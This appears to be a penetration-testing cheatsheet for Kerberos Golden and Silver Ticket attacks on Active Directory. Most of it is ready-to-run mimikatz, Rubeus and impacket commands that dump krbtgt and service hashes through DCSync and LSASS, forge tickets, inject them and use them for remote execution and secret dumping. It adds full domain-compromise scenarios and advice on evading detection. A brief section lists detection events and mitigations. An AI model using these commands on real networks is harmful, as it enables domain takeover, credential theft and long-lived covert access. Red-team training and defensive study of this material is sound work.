Kerberos Ticket Attacks Cheatsheet

Overview

Understanding Kerberos Ticket Attacks

Golden Tickets and Silver Tickets are forged Kerberos tickets that provide persistence and stealth:

• Golden Ticket: Forged TGT (Ticket Granting Ticket) using krbtgt hash
• Valid for 10 years by default
• Works for any service in the domain

• Survives password changes (except krbtgt)

• Silver Ticket: Forged TGS (Ticket Granting Service) using service account hash

• Valid for specific service only
• More stealthy (no DC communication)
• Requires target service hash

---

Prerequisites & Requirements

Required Information for Ticket Forging

Attack Type	Required Data	How to Obtain
Golden Ticket	krbtgt NTLM hash	DCSync, NTDS dump, Mimikatz on DC
Golden Ticket	Domain SID	whoami /user, PowerView, lookupsid
Golden Ticket	Domain name	Environment variable, AD enumeration
Silver Ticket	Service account hash	Kerberoasting, NTDS, local extraction
Silver Ticket	Domain SID	Same as Golden Ticket
Silver Ticket	Target SPN	Service enumeration, setspn -L

---

Golden Ticket Attacks

Obtaining Prerequisites

Get Domain SID

# Linux - Using lookupsid
impacket-lookupsid <domain>/<user>:'<password>'@<dc-ip> -domain-sids
# Look for: Domain SID is: S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX

# Linux - Using rpcclient
rpcclient -U '<domain>/<user>%<password>' <dc-ip> -c "lsaquery"

# Windows - PowerShell
whoami /user
# Extract SID minus the last segment (RID)

# Windows - PowerView
Import-Module .\PowerView.ps1
Get-DomainSID

# Windows - Native AD Module
(Get-ADDomain).DomainSID.Value

Get krbtgt Hash

# Linux - DCSync
impacket-secretsdump -just-dc-user krbtgt <domain>/<user>:'<password>'@<dc-ip>

# Linux - NTDS dump
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

# Windows - Mimikatz DCSync
mimikatz.exe "lsadump::dcsync /domain:<domain> /user:krbtgt" exit

# Windows - From LSASS (on DC)
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit

Forging Golden Tickets

Linux - Golden Ticket Creation

# Create Golden Ticket (TGT)
impacket-ticketer \
    -nthash <krbtgt-ntlm-hash> \
    -domain-sid <domain-sid> \
    -domain <domain.local> \
    Administrator

# Full example with all options
impacket-ticketer \
    -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 \
    -domain-sid S-1-5-21-1870146311-1183348186-593267556 \
    -domain inlanefreight.local \
    -user-id 500 \
    -groups 512,513,514,515,516,517,518,519,520 \
    -duration 3650 \
    Administrator

# Output: Administrator.ccache

Windows - Golden Ticket Creation with Mimikatz

# Method 1: Create and inject into current session (PTT)
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<krbtgt-hash> /user:Administrator /ptt" exit

# Method 2: Create and save to file
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<krbtgt-hash> /user:Administrator /ticket:golden.kirbi" exit

# Full example with all parameters
mimikatz.exe "kerberos::golden /domain:inlanefreight.local /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:ff955e93a130f5bb1a6565f32b7dc127 /user:Administrator /id:500 /groups:512,513,514,515,516,517,518,519,520 /ptt" exit

# With AES keys (more stealthy)
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /aes256:<krbtgt-aes256> /user:Administrator /ptt" exit

Using Golden Tickets

Linux - Using Golden Tickets

# Set the ticket for use
export KRB5CCNAME=./Administrator.ccache

# Verify ticket
klist

# Access services
impacket-psexec -k -no-pass <target>.<domain>
impacket-smbclient -k -no-pass <target>.<domain>
impacket-wmiexec -k -no-pass <target>.<domain>
impacket-secretsdump -k -no-pass <target>.<domain>

# Access shares
smbclient //<target>.<domain>/C$ -k -no-pass

# Note: Use FQDN for Kerberos auth (-k flag)

Windows - Using Golden Tickets

# Verify ticket injection
klist

# Access remote systems
dir \\<target>\c$

# PsExec with current ticket
PsExec.exe -accepteula \\<target> cmd

# Enter remote session
Enter-PSSession -ComputerName <target>

# Using Rubeus for ticket management
Rubeus.exe ptt /ticket:golden.kirbi

---

Silver Ticket Attacks

Understanding Silver Tickets

Silver Ticket Characteristics

• Target specific services (CIFS, HOST, HTTP, MSSQL, etc.)
• Don't touch the DC after creation (stealthier)
• Limited to single service on single machine
• Common services:
• CIFS: File system access
• HOST: WMI, PsExec, scheduled tasks
• HTTP: Web services, PowerShell Remoting
• LDAP: Directory queries
• MSSQL: Database access

Forging Silver Tickets

Linux - Silver Ticket Creation

# Create Silver Ticket for specific service
impacket-ticketer \
    -nthash <service-account-hash> \
    -domain-sid <domain-sid> \
    -domain <domain.local> \
    -spn <service>/<target>.<domain> \
    Administrator

# Example: CIFS service (file access)
impacket-ticketer \
    -nthash 542780725df68d3456a0672f59001987 \
    -domain-sid S-1-5-21-1870146311-1183348186-593267556 \
    -domain inlanefreight.local \
    -spn cifs/sql01.inlanefreight.local \
    Administrator

# Example: Multiple services
# HOST for WMI/PsExec
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn host/<target> Administrator

# HTTP for PowerShell Remoting
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn http/<target> Administrator

Windows - Silver Ticket Creation with Mimikatz

# Create and inject Silver Ticket
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<service-hash> /user:Administrator /target:<target>.<domain> /service:<service> /ptt" exit

# Example: CIFS Silver Ticket
mimikatz.exe "kerberos::golden /domain:inlanefreight.local /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /user:Administrator /ptt" exit

# Create file for later use
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<service-hash> /target:<target> /service:<service> /user:Administrator /ticket:silver.kirbi" exit

# Multiple services in one ticket
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<computer-hash> /target:<target> /service:cifs,host /user:Administrator /ptt" exit

---

Pass-the-Ticket (PTT) Techniques

Extracting Existing Tickets

Windows - Ticket Extraction

# List all tickets in memory
Rubeus.exe triage

# Dump specific ticket by LUID
Rubeus.exe dump /luid:0x89275d /nowrap

# Dump specific service ticket
Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Export with Mimikatz
mimikatz.exe "sekurlsa::tickets /export" exit

# List current session tickets
klist

Linux - Ticket Extraction

# From ccache files
export KRB5CCNAME=/tmp/krb5cc_1000
klist

# Convert between formats
impacket-ticketConverter silver.kirbi silver.ccache
impacket-ticketConverter golden.ccache golden.kirbi

Using Extracted/Forged Tickets

Windows - Pass-the-Ticket

# Method 1: Rubeus PTT
Rubeus.exe ptt /ticket:<base64-ticket>
Rubeus.exe ptt /ticket:silver.kirbi

# Method 2: Mimikatz PTT
mimikatz.exe "kerberos::ptt silver.kirbi" exit

# Method 3: Rubeus with sacrificial process
Rubeus.exe createnetonly /program:cmd.exe /show
# Note the ProcessID and LUID
Rubeus.exe ptt /ticket:silver.kirbi /luid:0x798c2c

# Verify ticket loaded
klist

Linux - Pass-the-Ticket

# Set environment variable
export KRB5CCNAME=./Administrator.ccache

# Or specify full path
export KRB5CCNAME=/tmp/admin_ticket.ccache

# Use with Impacket tools
impacket-psexec -k -no-pass <target>
impacket-smbclient -k -no-pass <target>

# Use with native tools
smbclient -k //<target>/C$
rpcclient -k <target>

---

Sacrificial Processes

Critical: Avoiding Service Disruption

Never overwrite SYSTEM or service tickets! Always use sacrificial processes:

# Create sacrificial process with Rubeus
Rubeus.exe createnetonly /program:cmd.exe /show
# Output: ProcessID: 4960, LUID: 0x798c2c

# Pass ticket to specific LUID
Rubeus.exe ptt /ticket:ticket.kirbi /luid:0x798c2c

# Or with Mimikatz (creates new logon session)
mimikatz.exe "sekurlsa::pth /user:Administrator /domain:<domain> /rc4:<hash> /run:cmd.exe" exit

---

Common Attack Scenarios

Scenario 1: Domain Compromise with Golden Ticket

# 1. Get domain SID
impacket-lookupsid <domain>/<user>:'<password>'@<dc-ip> -domain-sids

# 2. DCSync for krbtgt
impacket-secretsdump -just-dc-user krbtgt <domain>/<user>:'<password>'@<dc-ip>

# 3. Create Golden Ticket
impacket-ticketer -nthash <krbtgt-hash> -domain-sid <sid> -domain <domain> Administrator

# 4. Use ticket
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass <dc>.<domain>

Scenario 2: Service-Specific Access with Silver Ticket

# 1. Get computer account hash (from local SAM/LSA)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# 2. Get domain SID
Get-DomainSID

# 3. Create Silver Ticket for CIFS
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<sid> /rc4:<computer-hash> /target:<target> /service:cifs /user:Administrator /ptt" exit

# 4. Access file system
dir \\<target>\c$

Scenario 3: Ticket Renewal for Persistence

# Extract current TGT
Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Renew ticket (extends validity)
Rubeus.exe renew /ticket:<base64-ticket> /ptt

# Monitor ticket lifetime
Rubeus.exe triage

---

Quick Reference Matrix

Ticket Attack Decision Matrix

Attack Type	Use Case	Required Hash	Stealth Level	Persistence
Golden Ticket	Full domain access	krbtgt	Medium	10 years
Silver Ticket	Single service	Service/Computer	High	7 days
Bronze Bit	S4U2self abuse	Service account	High	Session
Diamond Ticket	TGT modification	krbtgt	Very High	Variable
Sapphire Ticket	S4U2proxy chains	Multiple	High	Session

---

OPSEC Considerations

Detection & Monitoring

Golden Ticket Indicators:

• Event 4768: TGT requested (but not for Golden Tickets)
• Event 4769: Service ticket requested with suspicious TGT
• Tickets with 10-year lifetime
• Tickets for non-existent users
• PAC validation failures

Silver Ticket Indicators:

• Event 4769: Absent (no TGS request)
• Direct service access without TGT
• Service tickets with unusual properties

Mitigation Detection:

• Regular krbtgt password rotation (kills Golden Tickets)
• Service account password changes (kills Silver Tickets)
• PAC validation enabled
• Kerberos ticket anomaly detection

---

Troubleshooting

Common Issues & Solutions

Issue	Solution
"Clock skew too great"	Sync time with DC: ntpdate <dc-ip>
"KDC_ERR_C_PRINCIPAL_UNKNOWN"	Use FQDN, not IP
"KRB5KDC_ERR_PREAUTH_REQUIRED"	Wrong hash or ticket expired
"Access Denied" with ticket	Wrong service type in Silver Ticket
Ticket not working	Check LUID, use sacrificial process
"The ticket lifetime is too short"	Renew or recreate ticket

---

Best Practices

Engagement Guidelines

1. Always use sacrificial processes to avoid service disruption
2. Document all ticket creation for cleanup
3. Monitor ticket lifetime and renew as needed
4. Use Silver Tickets when possible (stealthier)
5. Rotate between techniques to avoid pattern detection
6. Clean up tickets after use: klist purge
7. Test in lab first to understand behavior
8. Use AES keys over RC4 when available (modern environments)